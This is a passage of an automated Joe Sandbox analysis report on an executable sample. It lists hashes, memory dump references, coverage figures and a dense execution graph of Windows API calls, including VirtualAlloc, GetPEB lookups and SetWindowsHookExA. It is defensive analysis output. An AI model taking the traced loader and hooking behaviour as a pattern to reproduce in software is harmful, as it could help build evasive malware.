                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 00420594
                  • LeaveCriticalSection.KERNEL32(00466584,?,?,?,?,00420B53,?,00000004,0041F372,00406452,00411FA3), ref: 0042059F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$Leave$EnterValue
                  • String ID:
                  • API String ID: 3969253408-0
                  • Opcode ID: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction ID: 125f687bcb126dd7327be4eaf8d3202bdee6bb285ee1efb8d35158a4d24e766b
                  • Opcode Fuzzy Hash: 340786f682d678f90d8c11d481e82e1f96306d9cde2d832645f35ad660a4072c
                  • Instruction Fuzzy Hash: 16F05476300228AFD7208F5AEC48C1B77EDFA893613554466F54693222D674F881CEDC
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Execution Graph

                  Execution Coverage:6.8%
                  Dynamic/Decrypted Code Coverage:11.4%
                  Signature Coverage:1.6%
                  Total number of Nodes:1713
                  Total number of Limit Nodes:50

                  Graph

43282->43321 43284 4143f7 43287 414413 43284->43287 43288 412d05 SetWindowPos 43284->43288 43285->43284 43322 413a2c 117 API calls 2 library calls 43285->43322 43323 4139c3 72 API calls ctype 43287->43323 43288->43287 43290 41441b 43324 408487 114 API calls ~_Task_impl 43290->43324 43292->43253 43293->43244 43295 412d93 __EH_prolog3 43294->43295 43296 412d9b GetWindowTextA 43295->43296 43297 412dac 43295->43297 43299 412df0 ctype std::_Locinfo::~_Locinfo 43296->43299 43298 4014c0 ctype 82 API calls 43297->43298 43300 412db4 43298->43300 43299->43257 43301 4048ed ctype 79 API calls 43300->43301 43302 412dd7 lstrlenA 43301->43302 43302->43299 43304 41fc7c 43303->43304 43305 41fc85 lstrlenA 43304->43305 43306 406436 ~_Task_impl LocalAlloc RaiseException 43304->43306 43307 41fca8 _memset 43305->43307 43306->43304 43308 41fcb4 GetWindowTextA 43307->43308 43309 41fcd9 SetWindowTextA 43307->43309 43308->43309 43310 41fcc7 lstrcmpA 43308->43310 43311 41fce1 43309->43311 43310->43309 43310->43311 43312 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43311->43312 43313 41fcee 43312->43313 43313->43254 43314->43247 43315->43260 43316->43270 43317->43274 43318->43278 43319->43269 43320->43273 43321->43285 43322->43284 43323->43290 43324->43292 43329 4217b7 43325->43329 43328 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43328->42890 43330 4217cf 43329->43330 43331 411663 43330->43331 43332 4217e8 CopyRect 43330->43332 43331->43328 43333 421819 43332->43333 43337 420e08 43333->43337 43341 413b62 43337->43341 43340 40cee2 7 API calls 43340->43331 43342 413b76 43341->43342 43343 406436 ~_Task_impl LocalAlloc RaiseException 43342->43343 43344 413b89 IsRectEmpty 43342->43344 43346 40f898 ~_Task_impl 114 API calls 43342->43346 43347 413bcb GetClientRect 43342->43347 43343->43342 43344->43342 43345 413b9a 43344->43345 43348 413bf9 BeginDeferWindowPos 43345->43348 43353 413bf3 43345->43353 43346->43342 43347->43345 43348->43353 43349 413fd5 
43350 413ff2 SetRectEmpty 43349->43350 43352 413fe9 KiUserCallbackDispatcher 43349->43352 43354 41400d 43350->43354 43351 413638 ctype LocalAlloc RaiseException 43351->43353 43352->43350 43353->43349 43353->43351 43355 413cb5 GetWindowRect 43353->43355 43357 413cec OffsetRect 43353->43357 43358 413e35 OffsetRect 43353->43358 43359 413e84 OffsetRect 43353->43359 43360 413d3f OffsetRect 43353->43360 43361 413e6e OffsetRect 43353->43361 43362 413d5c EqualRect 43353->43362 43363 413ed3 EqualRect 43353->43363 43364 413d25 OffsetRect 43353->43364 43365 40b917 LocalAlloc RaiseException ctype 43353->43365 43366 40cee2 7 API calls 43353->43366 43367 4260f4 71 API calls 43353->43367 43354->43331 43354->43340 43356 422bfb GetWindowLongA ScreenToClient ScreenToClient 43355->43356 43356->43353 43357->43353 43358->43353 43359->43363 43360->43362 43361->43353 43362->43353 43363->43353 43364->43353 43365->43353 43366->43353 43367->43353 43369 412b38 GetWindowLongA 43368->43369 43370 422120 43369->43370 43371 42216a 43370->43371 43372 412d05 SetWindowPos 43370->43372 43373 412b38 GetWindowLongA 43371->43373 43372->43371 43375 422171 43373->43375 43374 4221be 43374->42790 43375->43374 43376 412b38 GetWindowLongA 43375->43376 43378 422184 43375->43378 43376->43378 43377 410293 114 API calls 43379 42218f 43377->43379 43378->43374 43378->43377 43381 4221aa 43379->43381 43392 40f898 114 API calls ~_Task_impl 43379->43392 43381->43374 43383 4077c6 43381->43383 43384 4077e8 43383->43384 43385 40786b 43384->43385 43390 41246b 251 API calls 43384->43390 43393 412611 43384->43393 43399 40fbd2 264 API calls 3 library calls 43385->43399 43387 407876 43388 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43387->43388 43389 407883 43388->43389 43389->43374 43390->43384 43392->43381 43394 412625 43393->43394 43395 412672 43393->43395 43394->43395 43396 41263c 43394->43396 43405 406436 2 API calls 4 library calls 43394->43405 43395->43384 43396->43395 43400 40773c 
43396->43400 43399->43387 43401 40684f IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 43400->43401 43402 407759 43401->43402 43403 40705f 15 API calls 43402->43403 43404 407779 43403->43404 43404->43395 43405->43396 43406->42900 43407->42898 43409 40d725 43408->43409 43410 40d73d 43409->43410 43462 406436 2 API calls 4 library calls 43409->43462 43452 424385 43410->43452 43413 40d743 43413->42926 43437 40d747 LocalAlloc LeaveCriticalSection RaiseException ctype 43413->43437 43415 408bca 453 API calls 43414->43415 43416 404814 43415->43416 43416->42960 43418 40ed96 109 API calls 43417->43418 43419 40548a 43418->43419 43420 4054ac 43419->43420 43421 40549a SetWindowLongA 43419->43421 43420->42960 43421->43420 43465 42143d DefWindowProcA 43422->43465 43425 40750b 43425->42960 43426 4074fe InvalidateRect 43426->43425 43428 42143d 10 API calls 43427->43428 43429 41326e 43428->43429 43429->42960 43472 409dd7 43430->43472 43434 405101 43434->42960 43435->42907 43436->42916 43437->42926 43438->42926 43439->42905 43440->42913 43442->42968 43443->42969 43445 422e12 43444->43445 43446 422e1e 43444->43446 43478 422dd3 43445->43478 43446->42960 43448 422e17 DeleteDC 43448->43446 43450->42925 43451->42919 43453 424395 43452->43453 43454 42439a 43452->43454 43463 406436 2 API calls 4 library calls 43453->43463 43456 4243a8 43454->43456 43464 42431c InitializeCriticalSection 43454->43464 43458 4243e4 EnterCriticalSection 43456->43458 43459 4243ba EnterCriticalSection 43456->43459 43458->43413 43460 4243c6 InitializeCriticalSection 43459->43460 43461 4243d9 LeaveCriticalSection 43459->43461 43460->43461 43461->43458 43462->43409 43463->43454 43464->43456 43466 421464 GetWindowRect 43465->43466 43470 4074ee 43465->43470 43467 421491 43466->43467 43468 4214ed 43466->43468 43467->43468 43469 42149d SetRect InvalidateRect SetRect InvalidateRect 43467->43469 43468->43470 43471 4214fd SetRect InvalidateRect SetRect InvalidateRect 
43468->43471 43469->43468 43470->43425 43470->43426 43471->43470 43473 40ed96 109 API calls 43472->43473 43475 409de4 43473->43475 43474 4050fa 43477 40474e 115 API calls ~_Task_impl 43474->43477 43475->43474 43476 409c7d 130 API calls 43475->43476 43476->43474 43477->43434 43479 422de0 43478->43479 43480 422de7 ctype 43478->43480 43482 422d15 112 API calls 4 library calls 43479->43482 43480->43448 43482->43480 43493 4014f0 43483->43493 43485 429320 GetShortPathNameA 43486 429333 43485->43486 43487 429341 43485->43487 43495 402830 82 API calls ctype 43486->43495 43489 40a356 82 API calls 43487->43489 43490 42934a 43489->43490 43491 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43490->43491 43492 416ac5 PathFindFileNameA 43491->43492 43492->42293 43494 40150d ctype 43493->43494 43494->43485 43495->43487 43496->42300 43497 44d144 43502 4498f9 43497->43502 43503 41f363 ctype 112 API calls 43502->43503 43504 449903 43503->43504 43505 449914 43504->43505 43510 438d85 113 API calls 9 library calls 43504->43510 43507 430b0e 43505->43507 43511 430ad2 43507->43511 43509 430b1b 43510->43505 43512 430ade _setvbuf 43511->43512 43519 4339cb 43512->43519 43518 430aff _setvbuf 43518->43509 43545 43a0bf 43519->43545 43521 430ae3 43522 4309e7 43521->43522 43554 435eef TlsGetValue 43522->43554 43525 435eef __decode_pointer 7 API calls 43526 430a0b 43525->43526 43538 430a8e 43526->43538 43566 4344b4 70 API calls 5 library calls 43526->43566 43528 430a75 43529 435e74 __encode_pointer 7 API calls 43528->43529 43531 430a83 43529->43531 43530 430a29 43530->43528 43532 430a53 43530->43532 43533 430a44 43530->43533 43535 435e74 __encode_pointer 7 API calls 43531->43535 43534 430a4d 43532->43534 43532->43538 43567 438222 75 API calls _realloc 43533->43567 43534->43532 43539 430a69 43534->43539 43568 438222 75 API calls _realloc 43534->43568 43535->43538 43542 430b08 43538->43542 43569 435e74 TlsGetValue 43539->43569 43540 430a63 43540->43538 43540->43539 43583 
4339d4 43542->43583 43546 43a0e7 EnterCriticalSection 43545->43546 43547 43a0d4 43545->43547 43546->43521 43552 439ffc 69 API calls 10 library calls 43547->43552 43549 43a0da 43549->43546 43553 43395f 69 API calls 3 library calls 43549->43553 43551 43a0e6 43551->43546 43552->43549 43553->43551 43555 435f07 43554->43555 43556 435f28 GetModuleHandleW 43554->43556 43555->43556 43557 435f11 TlsGetValue 43555->43557 43558 435f43 GetProcAddress 43556->43558 43559 435f38 43556->43559 43562 435f1c 43557->43562 43561 435f20 43558->43561 43581 43392f Sleep GetModuleHandleW 43559->43581 43564 435f53 RtlDecodePointer 43561->43564 43565 4309fb 43561->43565 43562->43556 43562->43561 43563 435f3e 43563->43558 43563->43565 43564->43565 43565->43525 43566->43530 43567->43534 43568->43540 43570 435ead GetModuleHandleW 43569->43570 43571 435e8c 43569->43571 43573 435ec8 GetProcAddress 43570->43573 43574 435ebd 43570->43574 43571->43570 43572 435e96 TlsGetValue 43571->43572 43577 435ea1 43572->43577 43576 435ea5 43573->43576 43582 43392f Sleep GetModuleHandleW 43574->43582 43579 435ee0 43576->43579 43580 435ed8 RtlEncodePointer 43576->43580 43577->43570 43577->43576 43578 435ec3 43578->43573 43578->43579 43579->43528 43580->43579 43581->43563 43582->43578 43586 439fe5 LeaveCriticalSection 43583->43586 43585 430b0d 43585->43518 43586->43585 43587 40f720 43588 40f733 43587->43588 43594 40f72e 43587->43594 43589 40ee68 112 API calls 43588->43589 43590 40f73d 43589->43590 43591 40f758 DefWindowProcA 43590->43591 43592 40f746 43590->43592 43591->43594 43593 40f62d 453 API calls 43592->43593 43593->43594 43595 4037c0 43632 403130 43595->43632 43606 4035a0 112 API calls 43607 403811 43606->43607 43608 403690 108 API calls 43607->43608 43609 40381a 43608->43609 43610 4035a0 112 API calls 43609->43610 43611 40382b 43610->43611 43612 403690 108 API calls 43611->43612 43613 403834 43612->43613 43614 4035a0 112 API calls 43613->43614 43615 403845 43614->43615 43616 403690 108 API calls 
43615->43616 43617 40384e 43616->43617 43665 402ef0 LoadStringW 43617->43665 43619 403884 43670 430d56 43619->43670 43622 4035a0 112 API calls 43623 4038aa 43622->43623 43624 403690 108 API calls 43623->43624 43625 4038b3 ctype 43624->43625 43626 4038cb VirtualAlloc 43625->43626 43627 4038f7 _setlocale 43626->43627 43628 402ef0 71 API calls 43627->43628 43629 403908 43628->43629 43674 403700 108 API calls std::ios_base::_Init 43629->43674 43631 403920 ctype 43633 403166 43632->43633 43675 402fd0 43633->43675 43635 40326d 43681 4030c0 43635->43681 43640 403340 43641 402fd0 71 API calls 43640->43641 43642 403380 43641->43642 43645 403388 43642->43645 43691 448692 43642->43691 43643 403432 43644 4030c0 71 API calls 43643->43644 43647 403441 43644->43647 43645->43643 43717 402d20 70 API calls 3 library calls 43645->43717 43649 402f80 43647->43649 43650 402f94 43649->43650 43651 402fcb 43650->43651 43804 402d20 70 API calls 3 library calls 43650->43804 43653 4035a0 43651->43653 43805 401af0 GetPEB 43653->43805 43655 402ef0 71 API calls 43657 4035cc ctype 43655->43657 43657->43655 43659 430d56 80 API calls 43657->43659 43660 4035df 43657->43660 43806 430fcd 80 API calls 2 library calls 43657->43806 43807 403470 43657->43807 43659->43657 43661 403690 43660->43661 43662 4036c2 43661->43662 43663 4036dd 43661->43663 43662->43663 43664 403470 108 API calls 43662->43664 43663->43606 43664->43662 43666 402f16 43665->43666 43667 402f3e 43665->43667 43814 402ab0 70 API calls 2 library calls 43666->43814 43667->43619 43669 402f38 43669->43619 43671 430d40 43670->43671 43815 43882f 43671->43815 43674->43631 43676 40300c 43675->43676 43679 403014 43675->43679 43688 4474d7 EnterCriticalSection std::_Lockit::_Lockit 43676->43688 43678 403037 43678->43635 43687 402d20 70 API calls 3 library calls 43678->43687 43679->43678 43680 402f80 70 API calls 43679->43680 43680->43678 43682 4030f5 43681->43682 43684 403100 43682->43684 43689 403060 70 API calls 43682->43689 43685 40311f 
43684->43685 43690 4474e0 LeaveCriticalSection std::_Locinfo::~_Locinfo 43684->43690 43685->43640 43687->43635 43688->43679 43689->43684 43690->43685 43692 44869e __EH_prolog3_GS 43691->43692 43694 4486a8 43692->43694 43696 4486fa 43692->43696 43697 4486eb 43692->43697 43721 431b87 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 43694->43721 43722 448494 70 API calls 2 library calls 43696->43722 43718 447f97 43697->43718 43700 448708 43723 44818f 7 API calls ctype 43700->43723 43702 448717 43724 44794f 7 API calls ctype 43702->43724 43704 44871e 43725 44818f 7 API calls ctype 43704->43725 43706 44872f 43726 44794f 7 API calls ctype 43706->43726 43708 448736 43709 448810 43708->43709 43710 44818f 7 API calls ctype 43708->43710 43711 44880e 43708->43711 43714 44794f 7 API calls ctype 43708->43714 43727 449e18 105 API calls 4 library calls 43708->43727 43728 448268 70 API calls 3 library calls 43708->43728 43709->43711 43713 447f97 _Fputc 105 API calls 43709->43713 43710->43708 43729 402090 69 API calls 2 library calls 43711->43729 43713->43711 43714->43708 43717->43643 43730 449aac 43718->43730 43720 447fa9 43720->43694 43722->43700 43723->43702 43724->43704 43725->43706 43726->43708 43727->43708 43728->43708 43729->43711 43731 449ab8 _setvbuf 43730->43731 43732 449aeb 43731->43732 43733 449acb 43731->43733 43749 440114 43732->43749 43776 431d3e 69 API calls __getptd_noexit 43733->43776 43737 449ad0 43777 4367e9 7 API calls 2 library calls 43737->43777 43740 449b7c 43786 449bb0 LeaveCriticalSection LeaveCriticalSection _ungetc 43740->43786 43741 449b6b 43741->43740 43755 43681f 43741->43755 43744 449ae0 _setvbuf 43744->43720 43746 449b5b 43785 4367e9 7 API calls 2 library calls 43746->43785 43750 440126 43749->43750 43751 440148 EnterCriticalSection 43749->43751 43750->43751 43753 44012e 43750->43753 43752 44013e 43751->43752 43752->43741 43778 4401f2 43752->43778 43754 43a0bf __lock 69 API calls 43753->43754 43754->43752 43756 4401f2 __fileno 69 
API calls 43755->43756 43757 43682f 43756->43757 43758 436851 43757->43758 43759 43683a 43757->43759 43761 436855 43758->43761 43769 436862 __flsbuf 43758->43769 43790 431d3e 69 API calls __getptd_noexit 43759->43790 43791 431d3e 69 API calls __getptd_noexit 43761->43791 43763 4368c3 43764 436952 43763->43764 43765 4368d2 43763->43765 43795 43feb4 103 API calls 5 library calls 43764->43795 43767 4368e9 43765->43767 43772 436906 43765->43772 43793 43feb4 103 API calls 5 library calls 43767->43793 43769->43763 43771 43683f 43769->43771 43773 4368b8 43769->43773 43792 43ffd9 69 API calls __mbspbrk_l 43769->43792 43771->43740 43772->43771 43794 43f668 73 API calls 6 library calls 43772->43794 43773->43763 43787 43ff90 43773->43787 43776->43737 43779 440201 43778->43779 43783 440216 43778->43783 43802 431d3e 69 API calls __getptd_noexit 43779->43802 43781 440206 43803 4367e9 7 API calls 2 library calls 43781->43803 43783->43741 43784 431d3e 69 API calls __getptd_noexit 43783->43784 43784->43746 43786->43744 43796 438191 43787->43796 43790->43771 43791->43771 43792->43773 43793->43771 43794->43771 43795->43771 43799 43819a 43796->43799 43797 43108c _malloc 68 API calls 43797->43799 43798 4381d0 43798->43763 43799->43797 43799->43798 43800 4381b1 Sleep 43799->43800 43801 4381c6 43800->43801 43801->43798 43801->43799 43802->43781 43804->43651 43805->43657 43806->43657 43808 40358c 43807->43808 43811 403483 43807->43811 43808->43657 43809 403130 72 API calls 43809->43811 43810 403340 108 API calls 43810->43811 43811->43808 43811->43809 43811->43810 43813 402d20 70 API calls 3 library calls 43811->43813 43813->43811 43814->43669 43816 438848 43815->43816 43819 438635 43816->43819 43831 430d81 43819->43831 43821 43865c 43839 431d3e 69 API calls __getptd_noexit 43821->43839 43824 438661 43840 4367e9 7 API calls 2 library calls 43824->43840 43827 438698 43829 4386bc wcstoxl 43827->43829 43841 440664 80 API calls 2 library calls 43827->43841 43830 40389f 43829->43830 43842 
431d3e 69 API calls __getptd_noexit 43829->43842 43830->43622 43832 430d94 43831->43832 43838 430de1 43831->43838 43843 436178 69 API calls 2 library calls 43832->43843 43834 430d99 43835 430dc1 43834->43835 43844 439212 77 API calls 5 library calls 43834->43844 43835->43838 43845 438a80 71 API calls 6 library calls 43835->43845 43838->43821 43838->43827 43839->43824 43841->43827 43842->43830 43843->43834 43844->43835 43845->43838 43846 414c85 43847 414c93 43846->43847 43850 414b9c 43847->43850 43851 414c59 43850->43851 43855 414bd2 43850->43855 43852 414bd3 RegOpenKeyExA 43852->43855 43853 414bf0 RegQueryValueExA 43853->43855 43854 414c42 RegCloseKey 43854->43855 43855->43851 43855->43852 43855->43853 43855->43854 43856 435ee6 43857 435e74 __encode_pointer 7 API calls 43856->43857 43858 435eed 43857->43858 43859 44cfc1 43864 42041b 43859->43864 43861 44cfcb 43862 430b0e __cinit 76 API calls 43861->43862 43863 44cfd5 43862->43863 43869 4203bf 8 API calls 43864->43869 43866 420427 43870 420379 7 API calls 43866->43870 43868 420433 LoadCursorA LoadCursorA 43868->43861 43869->43866 43870->43868 43871 410b6d 43898 431ace 43871->43898 43873 410b79 GetPropA 43874 410ba3 43873->43874 43875 410c46 43873->43875 43876 410c25 43874->43876 43877 410ba8 43874->43877 43878 40ee3c ~_Task_impl 113 API calls 43875->43878 43879 40ee3c ~_Task_impl 113 API calls 43876->43879 43880 410bad 43877->43880 43881 410bfe SetWindowLongA RemovePropA GlobalFindAtomA GlobalDeleteAtom 43877->43881 43882 410c4e 43878->43882 43883 410c2b 43879->43883 43884 410c64 CallWindowProcA 43880->43884 43885 410bb8 43880->43885 43881->43884 43886 40ee3c ~_Task_impl 113 API calls 43882->43886 43901 410af5 121 API calls 2 library calls 43883->43901 43890 410bf3 std::_Locinfo::~_Locinfo 43884->43890 43888 40ee3c ~_Task_impl 113 API calls 43885->43888 43889 410c56 43886->43889 43892 410bbe 43888->43892 43902 410a7d 120 API calls 43889->43902 43891 410c3d 43894 410c60 43891->43894 43899 40d7c1 GetWindowRect 
GetWindowLongA 43892->43899 43894->43884 43894->43890 43896 410bce CallWindowProcA 43900 40f5b7 148 API calls ctype 43896->43900 43898->43873 43899->43896 43900->43890 43901->43891 43902->43894 43903 43156e 43942 431818 43903->43942 43905 43157a GetStartupInfoA 43906 43159d 43905->43906 43943 43abb6 HeapCreate 43906->43943 43909 4315ed 43945 43632f GetModuleHandleW 43909->43945 43913 4315fe __RTC_Initialize 43979 43b789 43913->43979 43916 43160c 43917 431618 GetCommandLineA 43916->43917 44069 43395f 69 API calls 3 library calls 43916->44069 43994 43b652 43917->43994 43920 431617 43920->43917 43924 43163d 44030 43b31f 43924->44030 43928 43164e 44045 433a1e 43928->44045 43931 431655 43932 431660 43931->43932 44072 43395f 69 API calls 3 library calls 43931->44072 44051 43b2c0 43932->44051 43938 43168f 44074 433bfb 69 API calls _doexit 43938->44074 43941 431694 _setvbuf 43942->43905 43944 4315e1 43943->43944 43944->43909 44067 431545 69 API calls 3 library calls 43944->44067 43946 436343 43945->43946 43947 43634a 43945->43947 44075 43392f Sleep GetModuleHandleW 43946->44075 43949 4364b2 43947->43949 43950 436354 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 43947->43950 44085 435fdb 72 API calls 2 library calls 43949->44085 43953 43639d TlsAlloc 43950->43953 43952 436349 43952->43947 43955 4315f3 43953->43955 43956 4363eb TlsSetValue 43953->43956 43955->43913 44068 431545 69 API calls 3 library calls 43955->44068 43956->43955 43957 4363fc 43956->43957 44076 433c19 7 API calls 4 library calls 43957->44076 43959 436401 43960 435e74 __encode_pointer 7 API calls 43959->43960 43961 43640c 43960->43961 43962 435e74 __encode_pointer 7 API calls 43961->43962 43963 43641c 43962->43963 43964 435e74 __encode_pointer 7 API calls 43963->43964 43965 43642c 43964->43965 43966 435e74 __encode_pointer 7 API calls 43965->43966 43967 43643c 43966->43967 44077 439f43 InitializeCriticalSectionAndSpinCount ___lock_fhandle 43967->44077 43969 436449 43969->43949 43970 435eef 
__decode_pointer 7 API calls 43969->43970 43971 43645d 43970->43971 43971->43949 44078 4381d6 43971->44078 43974 435eef __decode_pointer 7 API calls 43975 436490 43974->43975 43975->43949 43976 436497 43975->43976 44084 436018 69 API calls 5 library calls 43976->44084 43978 43649f GetCurrentThreadId 43978->43955 44104 431818 43979->44104 43981 43b795 GetStartupInfoA 43982 4381d6 __calloc_crt 69 API calls 43981->43982 43983 43b7b6 43982->43983 43984 43b9d4 _setvbuf 43983->43984 43987 4381d6 __calloc_crt 69 API calls 43983->43987 43989 43b91b 43983->43989 43990 43b89e 43983->43990 43984->43916 43985 43b951 GetStdHandle 43985->43989 43986 43b9b6 SetHandleCount 43986->43984 43987->43983 43988 43b963 GetFileType 43988->43989 43989->43984 43989->43985 43989->43986 43989->43988 44106 43c56f InitializeCriticalSectionAndSpinCount _setvbuf 43989->44106 43990->43984 43990->43989 43991 43b8c7 GetFileType 43990->43991 44105 43c56f InitializeCriticalSectionAndSpinCount _setvbuf 43990->44105 43991->43990 43995 43b670 GetEnvironmentStringsW 43994->43995 43996 43b68f 43994->43996 43997 43b684 GetLastError 43995->43997 43998 43b678 43995->43998 43996->43998 43999 43b728 43996->43999 43997->43996 44000 43b6ab GetEnvironmentStringsW 43998->44000 44001 43b6ba WideCharToMultiByte 43998->44001 44002 43b731 GetEnvironmentStrings 43999->44002 44003 431628 43999->44003 44000->44001 44000->44003 44006 43b6ee 44001->44006 44007 43b71d FreeEnvironmentStringsW 44001->44007 44002->44003 44004 43b741 44002->44004 44019 43b597 44003->44019 44008 438191 __malloc_crt 69 API calls 44004->44008 44009 438191 __malloc_crt 69 API calls 44006->44009 44007->44003 44010 43b75b 44008->44010 44011 43b6f4 44009->44011 44012 43b762 FreeEnvironmentStringsA 44010->44012 44013 43b76e _setlocale 44010->44013 44011->44007 44014 43b6fc WideCharToMultiByte 44011->44014 44012->44003 44017 43b778 FreeEnvironmentStringsA 44013->44017 44015 43b716 44014->44015 44016 43b70e 44014->44016 44015->44007 44107 4316f6 69 API 
calls 7 library calls 44016->44107 44017->44003 44020 43b5b1 GetModuleFileNameA 44019->44020 44021 43b5ac 44019->44021 44023 43b5d8 44020->44023 44114 438f1f 113 API calls __setmbcp 44021->44114 44108 43b3fd 44023->44108 44025 431632 44025->43924 44070 43395f 69 API calls 3 library calls 44025->44070 44027 438191 __malloc_crt 69 API calls 44028 43b61a 44027->44028 44028->44025 44029 43b3fd _parse_cmdline 79 API calls 44028->44029 44029->44025 44031 43b328 44030->44031 44032 43b32d _strlen 44030->44032 44116 438f1f 113 API calls __setmbcp 44031->44116 44034 431643 44032->44034 44035 4381d6 __calloc_crt 69 API calls 44032->44035 44034->43928 44071 43395f 69 API calls 3 library calls 44034->44071 44040 43b362 _strlen 44035->44040 44036 43b3c0 44119 4316f6 69 API calls 7 library calls 44036->44119 44038 4381d6 __calloc_crt 69 API calls 44038->44040 44039 43b3e6 44120 4316f6 69 API calls 7 library calls 44039->44120 44040->44034 44040->44036 44040->44038 44040->44039 44043 43b3a7 44040->44043 44117 433c67 69 API calls __mbspbrk_l 44040->44117 44043->44040 44118 4366c1 10 API calls 3 library calls 44043->44118 44046 433a2c __IsNonwritableInCurrentImage 44045->44046 44121 43c31e 44046->44121 44048 433a4a __initterm_e 44049 430b0e __cinit 76 API calls 44048->44049 44050 433a69 __IsNonwritableInCurrentImage __initterm 44048->44050 44049->44050 44050->43931 44052 43b2ce 44051->44052 44054 43b2d3 44051->44054 44125 438f1f 113 API calls __setmbcp 44052->44125 44056 431666 44054->44056 44126 434a02 79 API calls x_ismbbtype_l 44054->44126 44057 4498ee 44056->44057 44058 44992f 44057->44058 44127 415ad9 44058->44127 44061 41f363 ctype 112 API calls 44062 449946 44061->44062 44130 42ffa2 SetErrorMode SetErrorMode 44062->44130 44065 431681 44065->43938 44073 433bcf 69 API calls _doexit 44065->44073 44067->43909 44068->43913 44069->43920 44070->43924 44071->43928 44072->43932 44073->43938 44074->43941 44075->43952 44076->43959 44077->43969 44080 4381df 44078->44080 44081 436476 
44080->44081 44082 4381fd Sleep 44080->44082 44086 43db85 44080->44086 44081->43949 44081->43974 44083 438212 44082->44083 44083->44080 44083->44081 44084->43978 44085->43955 44087 43db91 _setvbuf 44086->44087 44088 43dba9 44087->44088 44091 43dbc8 _memset 44087->44091 44099 431d3e 69 API calls __getptd_noexit 44088->44099 44090 43dbae 44100 4367e9 7 API calls 2 library calls 44090->44100 44093 43dc3a RtlAllocateHeap 44091->44093 44095 43a0bf __lock 68 API calls 44091->44095 44096 43dbbe _setvbuf 44091->44096 44101 43a8d1 5 API calls 2 library calls 44091->44101 44102 43dc81 LeaveCriticalSection _doexit 44091->44102 44103 43add9 7 API calls __decode_pointer 44091->44103 44093->44091 44095->44091 44096->44080 44099->44090 44101->44091 44102->44091 44103->44091 44104->43981 44105->43990 44106->43989 44107->44015 44110 43b41c 44108->44110 44112 43b489 44110->44112 44115 434a02 79 API calls x_ismbbtype_l 44110->44115 44111 43b587 44111->44025 44111->44027 44112->44111 44113 434a02 79 API calls __wincmdln 44112->44113 44113->44112 44114->44020 44115->44110 44116->44032 44117->44040 44118->44043 44119->44034 44120->44034 44122 43c324 44121->44122 44123 435e74 __encode_pointer 7 API calls 44122->44123 44124 43c33c 44122->44124 44123->44122 44124->44048 44125->44054 44126->44054 44128 41f396 ~_Task_impl 112 API calls 44127->44128 44129 415ade 44128->44129 44129->44061 44131 41f363 ctype 112 API calls 44130->44131 44132 42ffbf 44131->44132 44146 41eb0a 44132->44146 44135 41f363 ctype 112 API calls 44136 42ffd4 44135->44136 44137 42fff1 44136->44137 44154 42fe1c 44136->44154 44139 41f363 ctype 112 API calls 44137->44139 44140 42fff6 44139->44140 44141 430002 GetModuleHandleA 44140->44141 44177 4161f7 44140->44177 44143 430022 44141->44143 44144 430011 GetProcAddress 44141->44144 44145 42eb6a 121 API calls 2 library calls 44143->44145 44144->44143 44145->44065 44183 41ea0e 44146->44183 44149 41eb50 44151 41eb57 SetLastError 44149->44151 44153 41eb64 44149->44153 44150 430650 
__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 44152 41ec04 44150->44152 44151->44153 44152->44135 44153->44150 44155 41f363 ctype 112 API calls 44154->44155 44156 42fe3b GetModuleFileNameA 44155->44156 44157 42fe63 44156->44157 44158 42fe6c PathFindExtensionA 44157->44158 44190 42282a RaiseException __CxxThrowException@8 44157->44190 44160 42fe83 44158->44160 44161 42fe88 44158->44161 44191 42282a RaiseException __CxxThrowException@8 44160->44191 44192 42fddc 83 API calls 2 library calls 44161->44192 44164 42fea5 44165 42feae 44164->44165 44193 42282a RaiseException __CxxThrowException@8 44164->44193 44175 42fec0 ctype 44165->44175 44194 433ccf 69 API calls 4 library calls 44165->44194 44169 42ff93 44170 430650 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 44169->44170 44173 42ffa0 44170->44173 44173->44137 44175->44169 44176 433ccf 69 API calls __strdup 44175->44176 44195 4063fe RaiseException __CxxThrowException@8 44175->44195 44196 41b239 117 API calls 2 library calls 44175->44196 44197 414fee 69 API calls 2 library calls 44175->44197 44198 4317a1 69 API calls __mbspbrk_l 44175->44198 44176->44175 44178 41f363 ctype 112 API calls 44177->44178 44179 4161fc 44178->44179 44180 416224 44179->44180 44199 41edab 44179->44199 44180->44141 44184 41ea17 GetModuleHandleA 44183->44184 44185 41ea7b GetModuleFileNameW 44183->44185 44186 41ea30 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 44184->44186 44187 41ea2b 44184->44187 44185->44149 44185->44153 44186->44185 44189 406436 2 API calls 4 library calls 44187->44189 44189->44186 44190->44158 44191->44161 44192->44164 44193->44165 44194->44175 44196->44175 44197->44175 44198->44175 44200 420aec ctype 106 API calls 44199->44200 44201 416208 GetCurrentThreadId SetWindowsHookExA 44200->44201 44201->44180 44202 22f0000 44204 22f0005 44202->44204 44207 22f002d 44204->44207 44227 22f0467 GetPEB 44207->44227 44210 22f0467 GetPEB 44211 22f0053 44210->44211 44212 22f0467 GetPEB 

                  Executed Functions

                  Control-flow Graph

                  APIs
